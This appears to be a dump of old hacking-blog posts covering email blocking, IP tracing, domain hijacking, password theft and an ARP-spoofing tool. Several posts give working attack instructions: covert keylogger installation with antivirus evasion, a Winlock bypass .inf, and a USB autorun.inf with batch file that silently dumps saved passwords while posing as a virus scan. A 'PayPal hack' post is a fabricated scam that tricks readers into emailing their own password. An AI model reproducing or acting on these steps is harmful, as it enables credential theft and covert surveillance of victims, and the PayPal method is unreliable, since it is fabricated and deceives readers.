6. Click on Next Step, select the action you’d like to take on the blocked emails. You may select the option Delete it so that the blocked email is moved to trash. To unblock the email, all you need to do is just delete the filter that you’ve created.

For Yahoo

1. Login to your account

2. At the top-right corner, click on Options

3. A drop down menu appears, now click on More options

4. In the left panel select the option Filters and click on create or edit filters

5. Now click on Add

6. In the next screen, give a name to your filter and in the From header field enter the email address that you want to block.

Fox ex. john@gmail.com or if you want to block an entire domain then just enter @xyz.com. Dont enter *@xyz.com. Select the option Move the message to: Trash and click on Save Changes.

For Hotmail

1. Login to your account

2. At the top-right corner, click on Options

3. A drop down menu appears, now click on More options

4. Click on Safe and blocked senders link under Junk e-mail

5. Now click on Blocked senders

6. Type in the email address that you want to block under blocked e-mail address or domain field.

For ex. Enter john@yahoo.com to block the individual email address or just enter xyz.com to block the entire domain.

That’s it. You no longer receive those annoying emails in your inbox. Keep your inbox clean and tidy. I hope this post helps. pass your comments!

How to Trace Any IP Address

2010-03-30T04:18:00.001-07:00

In my earlier post I had discussed about how to capture the IP address of a remote computer. Once you obtain this IP address it is necessary to trace it back to it’s source. So in this post I will show you how to trace any IP address back to it’s source. In fact tracing an IP address is very simple and easy than we think. There exists many websites through which you can trace any IP address back to it’s source. One of my favorite site is ip2location.com. Just go to http://www.ip2location.com/demo.aspx and enter the IP address that you want to trace in the dialog box and click on “Find Location”‘. With just a click of a button you can find the following information for any given IP address.

1. Country in which the IP is located

2. Region

3. City

4. Latitude/Longitude

5. Zip Code

6. Time Zone

7. Name of the ISP

8. Internet Speed

9. Weather Station

10. Area Code and

11. Domain name associated with the IP address.

A sample snapshot of the results from ip2location.com is given below

ip2location_results

You can also visually trace route any IP address back to it’s location. For this just visit http://www.yougetsignal.com/tools/visual-tracert/ and enter the IP you want to trace in the dialog box and hit the “Proxy Trace” button. Wait for few seconds and the visual trace route tool displays the path Internet packets traverse to reach a specified destination. Hope this helps. Please pass you comments.

Domain Hijacking – How to Hijack a Domain

2010-03-30T04:13:00.000-07:00

In this post I will tell you about how the domain names are hacked and how they can be protected. The act of hacking domain names is commonly known as Domain Hijacking. For most of you, the term “domain hijacking” may seem to be like an alien. So let me first tell you what domain hijacking is all about.

Domain hijacking is a process by which Internet Domain Names are stolen from it’s legitimate owners. Domain hijacking is also known as domain theft. Before we can proceed to know how to hijack domain names, it is necessary to understand how the domain names operate and how they get associated with a particular web server (website).

The operation of domain name is as follows

Any website say for example gohacking.com consists of two parts. The domain name (gohacking.com) and the web hosting server where the files of the website are actually hosted. In reality, the domain name and the web hosting server (web server) are two different parts and hence they must be integrated before a website can operate successfully. The integration of domain name with the web hosting server is done as follows.

1. After registering a new domain name, we get a control panel where in we can have a full control of the domain.

2. From this domain control panel, we point our domain name to the web server where the website’s files are actually hosted.

For a clear understanding let me take up a small example.

John registers a new domain “abc.com” from an X domain registration company. He also purchases a hosting plan from Y hosting company. He uploads all of his files (.html, .php, javascripts etc.) to his web server (at Y). From the domain control panel (of X) he configures his domain name “abc.com” to point to his web server (of Y). Now whenever an Internet user types “abc.com”, the domain name “abc.com” is resolved to the target web server and the web page is displayed. This is how a website actually works.

What happens when a domain is hijacked

Now let’s see what happens when a domain name is hijacked. To hijack a domain name you just need to get access to the domain control panel and point the domain name to some other web server other than the original one. So to hijack a domain you need not gain access to the target web server.

For example, a hacker gets access to the domain control panel of “abc.com”. From here the hacker re-configures the domain name to point it to some other web server (Z). Now whenever an Internet user tries to access “abc.com” he is taken to the hacker’s website (Z) and not to John’s original site (Y).

In this case the John’s domain name (abc.com) is said to be hijacked.

How the domain names are hijacked

To hijack a domain name, it’s necessary to gain access to the domain control panel of the target domain. For this you need the following ingredients

1. The domain registrar name for the target domain.

2. The administrative email address associated with the target domain.

These information can be obtained by accessing the WHOIS data of the target domain. To get access the WHOIS data, goto whois.domaintools.com, enter the target domain name and click on Lookup. Once the whois data is loaded, scroll down and you’ll see Whois Record. Under this you’ll get the “Administrative contact email address”.

To get the domain registrar name, look for something like this under the Whois Record. “Registration Service Provided By: XYZ Company”. Here XYZ Company is the domain registrar. In case if you don’t find this, then scroll up and you’ll see ICANN Registrar under the “Registry Data”. In this case, the ICANN registrar is the actual domain registrar.

The administrative email address associated with the domain is the backdoor to hijack the domain name. It is the key to unlock the domain control panel. So to take full control of the domain, the hacker will hack the administrative email associated with it. Email hacking has been discussed in my previous post how to hack an email account.

Once the hacker take full control of this email account, he will visit the domain registrar’s website and click on forgot password in the login page. There he will be asked to enter either the domain name or the administrative email address to initiate the password reset process. Once this is done all the details to reset the password will be sent to the administrative email address. Since the hacker has the access to this email account he can easily reset the password of domain control panel. After resetting the password, he logs into the control panel with the new password and from there he can hijack the domain within minutes.

How to protect the domain name from being hijacked

The best way to protect the domain name is to protect the administrative email account associated with the domain. If you loose this email account, you loose your domain. So refer my previous post on how to protect your email account from being hacked. Another best way to protect your domain is to go for private domain registration. When you register a domain name using the private registration option, all your personal details such as your name, address, phone and administrative email address are hidden from the public. So when a hacker performs a WHOIS lookup for you domain name, he will not be able to find your name, phone and administrative email address. So the private registration provides an extra security and protects your privacy. Private domain registration costs a bit extra amount but is really worth for it’s advantages. Every domain registrar provides an option to go for private registration, so when you purchase a new domain make sure that you select the private registration option.

How to Hack a Yahoo Password

2010-03-30T04:09:00.000-07:00

Everyday I get a lot of emails from people asking how to hack a Yahoo password? So if you’re curious to know how to hack Yahoo then this is the post for you. In this post I will give you the real and working ways to hack Yahoo password.

Is it possible to hack Yahoo?

Yes! As a matter of fact it’s possible to hack almost any email password. But before you learn the real ways to hack Yahoo password, the following are the things you should be aware of.

1. There is no ready made software or program that can hack a Yahoo password just by entering the target username. If you come accross a site that claims to sell such Yahoo password hacking software then it’s 100% scam.

2. Never trust any Hacking Service that claims to hack Yahoo password just for $100 or $200. All the hacking services are scams.

3. With my experience of about 6 years in the field of Hacking and IT security, I can tell you that there are only TWO ways to hack Yahoo password: They are Keylogging and Phishing. All the other password hacking methods are simply scam or don’t work! The following are the only 2 working and foolproof methods to hack Yahoo password.

1. EASIEST WAY TO HACK YAHOO

Using keylogger is the easiest way to hack a Yahoo password. A keylogger is a small program that records each and every keystroke (including passwords) that a user types on a specific computer’s keyboard. A keylogger is also called as Spy program or Spy software. To use it you don’t need to have any special knowledge. Anyone with a basic knowledge of computer can use it. With my experience I recommend the following keylogger as the best for hacking Yahoo password.
SniperSpy

How can I use SniperSpy for hacking Yahoo?

You can hack Yahoo password using SniperSpy as follows:

1. After you purchase it, you’ll be able to create the installation module. You need to email this module to the remote user as an attachment.

2. When the remote user runs the module it’ll get installed silently and monitoring process will begin. The keystrokes are captured and uploaded to the SniperSpy servers continously.

3. You can login to your Sniperspy account (you get this after purchase) to see the logs which contains the password. In this way you can hack Yahoo or any email using sniperspy.

The working of Winspy is almost same as Sniperspy.

I don’t have physical access to the target computer, can I still use sniperspy?

Yes you can still use it for hacking Yahoo. Because it offers Remote Installation Feature. With this feature it is possible to remotely install the keylogger on the victim’s PC. However they can also work on a local computer.

Once I install sniperspy can the victim come to know about it’s presence?

No. The victim will never come to know about it’s presence on his/her computer. This is because, once installed the keylogger will run in total stealth mode. Unlike other programs it will never show up in start-menu, start-up, program files, add/remove programs and task manager.

Can I be traced back if I install it on some other computer?

No, it’s almost impossible to trace back to you for installing the keylogger on other’s PC.

What if the antivirus block from sending it as an email attachment?

Instead of sending the keylogger as an email attachment, you place the file in .ZIP/.RAR format and upload it to www.fileden.com. After uploading, just send the direct download link to the victim via email. Once he downloads the file from this link and run it, the keylogger will get installed automatically.

How safe is to use SniperSpy?

Sniperspy is completely safe to use since all the customer databases remain confidential and private. They doesn’t collect any information from your system and will not contact you in any way unless you request assistance.

Is my online order 100% Safe and Secure?

Absolutely Yes! All the e-commerce transactions for SniperSpy is handled by Plimus – they are a trusted online retailer specializing in digitally delivered products. All your information remains private and secure. The safety and protection of your personal information is 100% guaranteed. So you can place your order for SniperSpy with no worries of scam!

So what are you waiting for? If you’re really serious to hack a Yahoo password then go grab Sniperspy now. Click on the following link to visit the Sniperspy site.
SniperSpy

NOTE: For more details on keylogger read my post How to use Keyloggers

2. OTHER WAYS TO HACK YAHOO

The other most commonly used trick to hack Yahoo password is using a Fake Login Page (also called as Phishing). Today, Fake login pages are the most widely used techniques to hack Yahoo password. A Fake Login page is a page that appears exactly as a Login page of sites like Yahoo, Gmail etc. But once we enter our password there, we end up loosing it.

However creating a fake login page and taking it online to successfully hack a Yahoo password is not an easy job. It demands an in depth technical knowledge of HTML and scripting languages like PHP, JSP etc. So if you are new to the concept of hacking passwords, then I recommend using the keyloggers to hack Yahoo password since it’s the easiest way.

Hack Paypal

2010-02-10T18:37:00.000-08:00

This is how to hack the paypal accounts hurry before it's to late and paypal chanes the bots again.
This is the new bot and everything you need to know to get into paypal. My buddy who works for paypal told me about the new bots and all so yah
This is my home adress and my name so if it doosen't work you can come kick my ass all around the world if you want but remember that it might not work the first time so try it a few times and hopfully it will work.
Charles elrik
5300 old highway rd
Honolulu,HI 96818
our just want to send me fan mail yah.
HOW TO HACK INTO PAYPAL ACCOUNT!!!
(Hotmail accounts for paypal accounts This is from october 22, 2005)

1) The following complete hacking tutorial contains materials that may not be suitable for irresponsible internet users, reader discretion is advised!
we have to put that so we don't get i trouble.
2) The hacking method is based on a secretly discovered security flaw in the PayPal (www.paypal.com) mailing address confirmation system. It will only work BEFORE PayPal discovers this serious security flaw and fixes it. Take your action FAST!
3) This method works for any body with PayPal accounts with CONFIRMED MAILING ADDRESSES. It will never work for PayPal user without a confirmed mailing address.
4) By strictly following instructions in the following tutorial, you'll gain unlimited access to various PayPal accounts with confirmed mailing addresses. Use those accounts AT YOUR OWN RISK. You?re responsible for your action!
5) When you use PayPal, NEVER log on to sites that do not start EXACTLY with www.paypal.com even if it contains the term ?paypal? in it.

PayPal is the latest victim of internet hackers. Despite the company?s seemingly perfect security system, a serious security flaw in the ADDRESS CONFIRMATION PROCESS of PayPal?s members? accounts has been discovered by a few experienced hackers from Russia. The hacking process has been simplified a while ago and it was revealed on a Russian language hacking website.
PayPal was immediately alerted of this security flaw after the Russian language hacking tutorial was published on the website, but in order to prevent its customers from losing trust in internet banking, PayPal chose NOT to alert its customers of this security flaw and has then secretly BANNED numerous online articles that contained information of this security flaw.
However, it has been confirmed that due to technical difficulty, PayPal has NOT yet fixed the problem and at this moment right now, anyone can STILL hack into a great number of PayPal accounts with confirmed addresses.
To inform users worldwide of this problem, I?ve attached an English version of the hacking process. Remember, to get the whole thing to work, you MUST
STRICTLY follow the instructions and have a PayPal account with a confirmed mailing address!

HACKING PROCESS:
Every PayPal member is identified by his/her Email and the majority of the PayPal members use Hotmail. After completion of the mailing address confirmation process, usually by adding a CREDIT CARD, PayPal automatically sends the user?s address confirmation info to a mailerbot associated with the user?s Email, in most cases, it?s Hotmail mailerbot.
The security flaw occurs RIGHT HERE! Both Yahoo and Hotmail mailerbots can be confused by a random user and sends out information saved on its server to that user.
To get PayPal account information of numerous random PayPal users from a Hotmail mailerbot, you have to do the following:

1) Log into your www.paypal.com homepage, and click on ?Profile?, and then click on
?Street Address? under ?Account Information?.

2) Find the Address whose status is ?Home?, and if it says ?confirmed?, then please read on.

Basically, A Confirmed Address is any address at which you receive your credit card statement. If you receive a credit card bill at this address, you can confirm it by entering your credit card information. This information will only be used to confirm your address. Your card will not be charged by PayPal.

So, if your Home address is NOT confirmed, then FOLLOW THE INSTRUCTIONS ON PAYPAL AND ADD A CREDIT CARD TO CONFIRM YOUR MAILING ADDRESS.

3) Okay, There are two bots which this will work for.
I. If you want an account with hotmail email, then:
Log in to your paypal email account and send an Email to:
paypalresponsebot035@hotmail.com (This is the hotmail mailerbot described above) (NEW) (Other mailer bots are not active now)

In the subject line, write:
789bot4*5%8verif-0e24 (To confuse the hotmail mailerbot)

In the email body, please write exactly 11 lines, which MUST BE as follows:
In line 1:Subject-Type: ?text/plain="+1"?

In line 2: charset=us-english
(To make the reply readable in your language so put you own language here otherwise it might come in a laguage you don't understand)

In line 3: botbody*78#9 confirmation0e24.hotmail.com
(To confuse the mailerbot)

In line 4: p38ylec00rm::s%%(a href=http://www.paypal.com%%)
(To make the mailerbot start retrieving information acquired from PayPal.)

In line 5: Your primary email at paypal
(To retrieve information from PayPal, The mailerbot now needs an Email which is the primary Email of a PayPal account with a confirmed mailing address, you have to use your own Email as a bait Email and you?ll need to receive info of other accounts from this Email too, so be sure this is your primary Email at PayPal.)

In line 6: start (retrieve > 07)
(To activate the mailerbot's retrieval function at the highest speed)

In line 7: verify#8% (*value= = float)
(This will trick him to send it to your email adress instead of the administrators)

In line 8: Your PayPal password
(Now you have to enter your paypal password to confuse the bot so it thinks your the administrator of paypal and it can send you the emails and passwords of people.)

In line 9: #searchppagend72hrlog
(to get info from PayPal members who had their addresses confirmed in the last 72 hours)

In line 10 send#%*idR20334-tsa-0583
(This will make the mailerbot send all the info to your email)

In line 11 (#%7*tmbot*="+098")
(this covers you trail so they cant find you. Last step!)

If you specifically follow the instructions above, you'll have email, passwords and all sorts of information of PayPal users who had their mailing addresses confirmed over the last 72 hours.

Winlock-unlock-hack

2010-01-30T02:01:00.000-08:00

What if we are in protecting your computer using winlock
simply use the following source

Version]
Signature = "$ Chicago $"
Provider = topengdigital

[DefaultInstall]
DelReg = del

[del]
HKCR, CLSID \ (D1A17367-PRT8-4546-6A19-11OO4FFI823O) \ PROGID, ID
HKCU, Software \ Microsoft \ Windows \ CurrentVersion \ Policies \ System, DisableTaskMgr
---------------------------------
save in notepad with the
name jebol.inf, then right-click jebol.inf
press install.
then ctrl + Alt + del (taskmanager raises)
winlock.exe looking at the process and in endtask
when you finish, start again winlock
press F11, please change password in accordance with our wishes
then change all the disabled (or leave) because we
you've hold the password.
I've tried versions of the results wrong 4:51

LAN Attacker 2009 V3.5

2009-12-31T11:46:00.000-08:00

100 % Clean, tested By NOD 32, Kaspersky and McAfee Antivirus
LAN Attacker (Standalone no need installation) is a program that can scan,attack,detect and protect computers on local area network.

The features as following:

1.1 Scan

-. It can scan and show the active hosts
on the LAN within a very short time (~2-3 seconds).

It has two scan mode, one is normal scanning, the other is antisniff scanning. The later is to find who is sniffing on the lan.

-. It can save and load computer list file.

-. It can scan the Lan regularly for new computer list.

-. It can update the computer list in passive mode using sniffing technology, that is, it can update the computer list from the sender’s address of arp request packets without scanning the lan.

-. It can perform advanced scanning when you open advanced scanning dialg on menu.

-. It can scan a B class ip range in advanced scan dialg.

-. It can scan acthost listed in event listview.

1.2 Attack

-. It can pull and collect all the packets on the LAN.

-. It can perform six attacking actions as following:

(1) Arp Flood – Send ip conflict packets to target computers as fast as possible, if you send too much, the target computers will down.

(2) BanGateway – Tell the gateway a wrong mac address of target computers, so the targets can’t receive packet from the internet. This attack is to forbid the targets access the internet.

(3) IPConflict – Like Arp Flood, send ip conflict packets to target computers regularly, maybe the users can’t work because of regular ip conflict message. what’s more, the targets can’t access the lan.

(4) SniffGateway – Spoof the targets and the gateway, you can use sniffer to collect packets between them.

(5) SniffHosts – Spoof among two or above targets, you can use sniffer to collect packets among all of them. (dangerous!!!!)

(6) SniffLan – Just like SniffGateway, the difference is that SniffLan sends broadcast arp packets to tell all computers on the lan that this host is just the gateway, So you can sniff all the data between all hosts with the gateway.(dangerous!!!!!!!!!!!!!!)

-. While spoofing ARP tables, it can act as another gateway (or ip-forwarder) without other users’ recognition on the LAN.

-. It can collect and forward packets through WinArpAttacker’s ipforward function, you had best check disable system ipforward function because WinArpAttacker can do well.

-. All data sniffed by spoofing and forwarded by WinArpAttacker ipforward function will be counted, as you can see on main interface.

-. As your wish, the arp table is recovered automatically in a little time (about 5 seconds). Your also can select not to recover.

1.3 Detect

-. What is the most important function, it can detect almost all attacking actions metioned as above as well as host status. the event WinArpAttacker can detect is listed as following:

SrcMac_Mismath – Host sent an arp packet, its src_mac doesn’t match,so the packet will be ignored.

DstMac_Mismath – Host recv an arp packet, its dst_mac doesn’t match,so the packet will be ignored.

Arp_Scan – Host is scanning the lan by arp request for a hosts list.

Arp_Antisniff_Scan – Host is scanning the lan for sniffing host,thus the scanner can know who is sniffing.

Host_Online – Host is online now.

Host_Modify_IP – Host modified its ip to or added a new IP.

Host_Modify_MAC – Host modified its mac address.

New_Host – New gost was found.

Host_Add_IP – Host added a new ip address.

Multi_IP_Host – Host has multi-ip addresses.

Multi_Mac_Host – Host has multi-mac addresses.

Attack_Flood – Host sends a lot of arp packets to another host ,so the target computer maybe slow down.

Attack_Spoof – Host sends special arp packets to sniff the data two targets , so the victims’ data exposed.

Attack_Spoof_Lan – Host lets all host on the lan believe that it’s just a gateway, so the intruder can sniff all hosts’ data to the real gateway.

Attack_Spoof_Ban_Access – Host told host that host has a inexist mac,so the targets can’t communicate with each other.

Attack_Spoof_Ban_Access_GW – Host told host that the gateway has a inexist mac, so the target can’t access the internet through the gateway.

Attack_Spoof_Ban_Access_Lan – Host broadcast host’s mac as a inexist mac, so the target can’t communicate with all hosts on the lan.

Attack_IP_Conflict – Host found another host has same ip as its, so the target would be disturbed by ip conflict messages.

Local_Arp_Entry_Change – now WinArpAttacker can watch local arp entry, when a host’s mac address in local arp table is changed, WinArpAttacker can report.

Local_Arp_Entry_Add – When a mac address of a host is added to local arp table, WinArpAttacker can report.

-. It can explain each event which WinArpAttacker detected.

-. It can save events to file.

1.4 Protect

-. Support arp table protect. when WinArpAttacker detects local or remote host’s is being arp-spoofing, it will recover local or remote host’s arp tables as you wish.

1.5 Proxy Arp

-. When hosts on your lan request other hosts’ mac address, WinArpAttacker will tell it a certain mac address as you wish.

-. It aims to realize accessing the internet without changing your ip on a new lan, but it also can make your lan in a big mass if you assign a wrong mac address.

1.6 Save arp packets

-. It can save all sniffed arp packets to file.

1.7 other features.

-. Support multi-network adapter and multi-ip address and multi-gateway on a computer, you can select different adapter and ip address to scan different lan.

-. Support DHCP and fixed ip address.

-. Count all the arp packets for each host, including sent and recieved arp packets.

Arp R/S Q/P

| |

Action(Recive/Send) Arp packets type(ReQuest/RePly)

- – - -

ArpRQ meaning: The number of arp request packets recieved

ArpRP meaning: The number of arp reply packets recieved

ArpSQ meaning: The number or arp request packets sent

ArpSP meaning: The number or arp reply packets sent

2. System Requirement.

————————————

-. Local : Windows XP/2000/2003/vista all version

-. Remote : All computers including network devices

-. WinPcap driver lastest must be needed ( all ready inside rar)

3. What’s New

————————————

+ It can scan a large ip range for online hosts by advanced scanning mode.

+ It can protect local and reomte hosts from arp-spoofing.

+ It can enable proxy arp, act as a arp proxy.

+ It can save all sniffed arp packets to file.

4. Getting Started

————————————

-. Firtly, install the latest WinPcap driver (Already in rar files)

-. second, just run LAN Attacker (Standalone no need instalation)

-. click scan button and start button

-. look at arp information on remote computer with “arp -a”

-. to stop attack, click stop button.

-. to select adapter or ip address, click options button.

-. to modify attacking setup, click options button.

- If there are many active hosts (more than 50) and the real gateway may be down on LAN.

How to Get Password Hackers

2009-12-31T11:43:00.000-08:00

Password theft, account takeover, it is often the case in the cyber world. It's not a difficult thing to do, but many of the newbie who just kept wondering .. "How do I get the other person's email password?" Or the most frequent questions I receive is .. "How do you get my password?": P

For questions that this article was written, hopefully you can add insight and open your mind about the importance of keeping the
accounts in vulnerable places.

How to get it?

There are many ways to get a password. Some of them do not require special skills. Here are the ways of the most common and most frequently used:

[1]. Social Engineering

[2]. KeyLogger

[3]. Web Spoofing

[4]. Block Email

[5]. Password Cracking

[6]. Session Hijacking

[7]. Being a Proxy Server

[8]. Failure to take advantage of the use of User Features

Browser

[9]. Googling

[1]. Social Engineering

Social Engineering is the name of a technique of collecting information by utilizing the gap victim psychology. Or maybe it should also be said as "fraud": P Social Engineering requires patience and caution to the unsuspecting victim. We are required to be creative and able to think like the victim.

Social Engineering is the art of "force" others to do things according to your expectations or desires. Of course "coercion" does not explicitly or outside the normal behavior is typical of the victim.

Humans tend to believe or easily swayed toward someone who has a big name, never (or are trying) to help, and have the words or a convincing performance. This is often used principal social engineering to ensnare his victims. Often the perpetrator make a condition that we have some addiction kepadanya.Ya, we unknowingly he conditioned us on an issue and make (as if - if only) that he can overcome that problem. Thus, we would tend to do what he instructed without feeling suspicious.

Social Engineering is sometimes a serious threat. It seems there is no connection with technology, social engineering but still skeptical as feasible can be fatal for your system. Why?? Because after all a computer still can not get away from humans. Yes, there is no single system komputerpun on this earth that can escape from human intervention. your defense as much as anything, if you are already controlled by the attacker through social engineering, then maybe you are the one who opened the entrance to the attacker.

[2]. KeyLogger

KeyLogger is a software that can record user activities. The results were used to record stored in the form of text or images. KeyLogger work by tapping the keyboard user. This application is able to identify sensitive forms such as a password form.

There is a safe way to avoid keyloger:

1. Use a password with special characters such as !@#$%^&*(){}[]. Most keyloger will ignore these characters so that the perpetrator (keyloger installer) will not get the actual password.

2. Prepare your password from home, save in the form of text. We want to enter a password, copy-paste tingal ajah. Keyloger will read your password by tapping the keyboard. But this risky way. Why? because when you make a copy, your data will be stored on the clipboard. We have found many free software that can display the data in the clipboard.

[3]. Web Spoofing

Still remember the case of some customers pecurian Account Bank BCA? Yes, that's one good example of Web spoofing. The essence of this technique is to use a user error when typing a website address into the address bar. Basically, Web Spoofing is an attempt to deceive the victim into thinking he is accessing a particular site, but it's not.

In the case of BCA, the perpetrator makes the site very similar and identical to the original site so that the victim will not be fooled in doubt fill in sensitive information such as user name and password. In fact, because the site is a scam site, then all this valuable information recorded by the fake Web server, which is owned by the perpetrator.

[4]. Block Email

Block email? Yes, and very easy to do this. One way is to use mailsnarf contained in dsniff utilities. How it works is by blocking Mailsnarf data packets through the Internet and arranged them into an email intact.

Mailsnift is Dsniff and software work on the basis of WinPcap (equivalent to the Linux libcap) is a library that captures data packets. Packets captured will be stored in a file by Windump, while MailSnarf act Dsniff and further analyze the data packets and display the password (dsniff) or email content (mailsnarf).

[5]. Password Cracking

"Hacking while sleeping." Was the phrase commonly used by people who do password cracking. Why? Because in general dibuthkan a long time to perform password cracking. Could for hours, even for days - days! It all depends on the target, whether the target using a common password, password length unusual character, or a combination of passwords with special characters.

One of the commonly used software to do this is by using Brutus, one of the remote password cracker software is quite popular. Brutus works with technical dictionary attack or bruce-force attack on http ports, POP3, ftp, telnet, and NetBIOS.

Dictionary attacks try to work with words in the dictionary passwords. While brute - force attack try to work with all combinations of letters, numbers, or characters.

Brute Force Atack working very slow and takes a long time depending on the type of computer specifications and character length password. We have had many sites that closed access to access to the login attempt constantly to no avail.

If you want to do Cracking passwords, please choose - choose their own applications on page Member - spyrozone.tk.

[6]. Session Hjacking

Session hijacking is more widespread today among the attackers. Session Hijacking usually done by doing imitation cookies. So in essence, we must be able to imitate the victim's cookies to get their login session.

So how do I get the victim's cookies?

1. By analysis Cookies.

This method is relatively difficult to do.

2. Stealing Cokies.

For example The Attacker wants to obtain the account A. The Attacker can easily make such a script that inserted Java script in the email to be sent to the victim opens the email korban.Saat it, subconsciously stolen and cookies will be recorded onto a Web server using a PHP script.

These days most often the target of a Friendster account. There are inserting a Scipt through testimonials, there is a paste in his own profile to steal the victim's cookies and so forth. I have tips for this:

1. Do not use the Internet Explorer browser

We want to open other people's profiles, do not use Internet Explorer. Write down the address you want to come along the profile view, first logout of your account and remove all cookies, then open your Friendster profile goals.

2. Check the source code

When receiving testimonials, please check your source code. Is there are foreign script or word which is identical with such counterfeiting:

"HACKED", "defaced", "Owned" .. etc. ..

If in doubt ... .... ajah reject ..

3. LOGOUT suddenly.

Alert when without a good reason you are suddenly logged off automatically from your account. When you are asked to enter a username and password, your addressbar preview! whether you are on the proper or not. Check the source code on the form tersebut.Lihat page action, where your information will be sent.

Actual session hijacking can be prevented if only the service provider notice the following things:

1. Assign a unique session identifier

2. Define the random pattern identifier system

3. Session identifier is independent

4. Session identifier that can be mapped to the connection

client side.

Another phenomenon is that, until now this article was published, it is often found that users who do not sign out after opening the account. Thus, people who use the computer and open the same website that has been opened by the first person will be automatically logged into the victim's account.

[7]. Being a Proxy Server

We can gather information with a proxy server for the victim to be able to surf. With a proxy server, the identity of the surfer can be ours.

[8]. Failure to take advantage of the user in the use of features

browser

Each browser must have features intended for convenience and comfort of users in the surf. Among them is the existence of the cache and Password Manager.

On the Internet of course a lot of websites whose content is not changed within a few days (for example spyrozone.tk Well, for a site like this cache be very useful. Cache will store the files so that future browsing if you visit the site again to the browser no longer have to download a second time from the server so that every page of your site that has previously opened will open more quickly. All that is usually governed by the header time to live.

Well, what about the sites of news providers are always up to date? For such sites, time to live it will be set = 0 so that later you will continue to download every time a visit.

Not comfortable enough? Yes, but the threat began to emerge. Try now you explore the options related to the cache in your browser. Of course you can see that there are facilities to determine how much temporary files that can be stored on disk. Search also the location where the files will be saved.

Try to open the folder, you will see the files html & image files from sites you've visited. In the IE browser, you can see the location of the cache files by exploring the Tools menu -> Internet options -> Settings

Then what can be found?? anyway just the files "trash"?? Hmm ... now let you copy all the files there into a folder. Then open one of htmlnya file. If the public computer, you can see what sites have been accessed by the person before you.

Hmm .. just by looking at your temporary files can even see the password and etc.. I met lots of sites that store passwords and display them on the url. Of course you also must have often read in many tutorials.

Most current browsers have a facility for storing passwords. For example when meggunakan Mozilla Firefox, you'll often receive a confirmation dialog box asking if you want your password saved or not by PasswordManager.Kebanyakan users tend to choose the YES option, either knowingly, or did they not know (read: do not want to know ) what the purpose of the dialogue box.

Others who then use the browser that can very easily get the password by entering the victim's Tools menu -> Options -> Security -> Saved passwords.

Another example is the password wand facilities owned by the Opera browser. When you enter a user name and password in a form and pressing the submit button, an opera by default will be asked to confirm to you whether you want the browser to save your id and password or not. Again and again ... most netter careless, they tend to select the option "YES".

So?? Others who then use a browser that can see what sites have been accessed by the user, point your browser to the site, place the cursor on a form the user name, press [ALT] + [ENTER] and BOOOMM!! Why? Do not be surprised yet!! Hehehe .. will automatically login with your user name filled in full with the victims password; D (It's fun enough ..

This is only a small example, the feature-firtur explore other browsers!

[9]. Googling

Google.com. Many sites have collapsed, passwords and numbers - credit card numbers stolen from the behavior of people who used to menyalahgunaan miracle, it's easy dilakukan.Hanya by typing certain keywords associated with a user name and password, you can harvest hundreds of user passwords via google. But now it seems you have to bite the fingers if you use the above; D

Do not be sad before because Google has just spawned a new product, the Google Code Search. New threat began to emerge, "the smart" is now able to crawl up to the archive files that are in a public web server directory. Be careful who had a habit to store important information in it (passwords, and other valuable information) should begin now eliminated the habit. Always protect folders sensitive to your site can live longer. Kalo nggak yach ... .. wait ajah anyone using the new product is to dredge google sensitive information from the web server. and if it had happened ... so be prepared .. "Playground" you will be taken over by it ..

how-to-hack-passwords-using-usb

2009-12-28T20:40:00.000-08:00

Using these tools and an USB pendrive you can create your own rootkit to hack passwords from your friend’s/college Computer. We need the following tools to create our rootkit.

MessenPass: Recovers the passwords of most popular Instant Messenger programs: MSN Messenger, Windows Messenger, Yahoo Messenger, ICQ Lite 4.x/2003, AOL Instant Messenger provided with Netscape 7, Trillian, Miranda, and GAIM.

Mail PassView: Recovers the passwords of the following email programs: Outlook Express, Microsoft Outlook 2000 (POP3 and SMTP Accounts only), Microsoft Outlook 2002/2003 (POP3, IMAP, HTTP and SMTP Accounts), IncrediMail, Eudora, Netscape Mail, Mozilla Thunderbird, Group Mail Free.
Mail PassView can also recover the passwords of Web-based email accounts (HotMail, Yahoo!, Gmail), if you use the associated programs of these accounts.

IE Passview: IE PassView is a small utility that reveals the passwords stored by Internet Explorer browser. It supports the new Internet Explorer 7.0, as well as older versions of Internet explorer, v4.0 – v6.0

Protected Storage PassView: Recovers all passwords stored inside the Protected Storage, including the AutoComplete passwords of Internet Explorer, passwords of Password-protected sites, MSN Explorer Passwords, and more…

PasswordFox: PasswordFox is a small password recovery tool that allows you to view the user names and passwords stored by Mozilla Firefox Web browser. By default, PasswordFox displays the passwords stored in your current profile, but you can easily select to watch the passwords of any other Firefox profile. For each password entry, the following information is displayed: Record Index, Web Site, User Name, Password, User Name Field, Password Field, and the Signons filename.

Here is a step by step procedure to create the password hacking toolkit.

NOTE: You must temporarily disable your Anti-Virus before following these steps.

1. Download all the 5 tools, extract them and copy only the executables(.exe files) into your USB Pendrive.

ie: Copy the files – mspass.exe, mailpv.exe, iepv.exe, pspv.exe and passwordfox.exe into your USB Drive.

2. Create a new Notepad and write the following text into it

[autorun]
open=launch.bat
ACTION= Perform a Virus Scan

save the Notepad as autorun.inf

Now copy the autorun.inf file onto your USB pendrive.

3. Create another Notepad and write the following text onto it.

start mspass.exe /stext mspass.txt

start mailpv.exe /stext mailpv.txt

start iepv.exe /stext iepv.txt

start pspv.exe /stext pspv.txt

start passwordfox.exe /stext passwordfox.txt

save the Notepad as launch.bat

Copy the launch.bat file also to your USB drive.

Now your rootkit is ready and you are all set to hack the passwords. You can use this pendrive on your friend’s PC or on your college computer. Just follow these steps

1. Insert the pendrive and the autorun window will pop-up. (This is because, we have created an autorun pendrive).

2. In the pop-up window, select the first option (Perform a Virus Scan).

3. Now all the password hacking tools will silently get executed in the background (This process takes hardly a few seconds). The passwords get stored in the .TXT files.

4. Remove the pendrive and you’ll see the stored passwords in the .TXT files.

This hack works on Windows 2000, XP and Vista.

8 Hidden Firefox Secrets Revealed

2009-12-28T20:37:00.001-08:00

The best thing about Firefox is that just when you think you know everything there is to know about the browser, something new comes along and surprises you. Here are few hidden tips and tricks. Maybe these are old hat and you know them already. Or maybe you had no idea these could be done. Lets see how many of these you know already.

1. Open docx file using Firefox without Office 2007: Now, you can view docx files using Firefox by installing OpenXMLViewer which is available for Windows, Mac and Linux users. It is an useful extension for users who haven’t upgrade to Microsoft Office 2007. Basically, the extension will convert docx documents into HTML format so that web browsers can render and display to users. So, the extension is not able to shows embedded objects.

2. More screen space: Make your icons small. Go to View – Toolbars – Customize and check the “Use small icons” box.

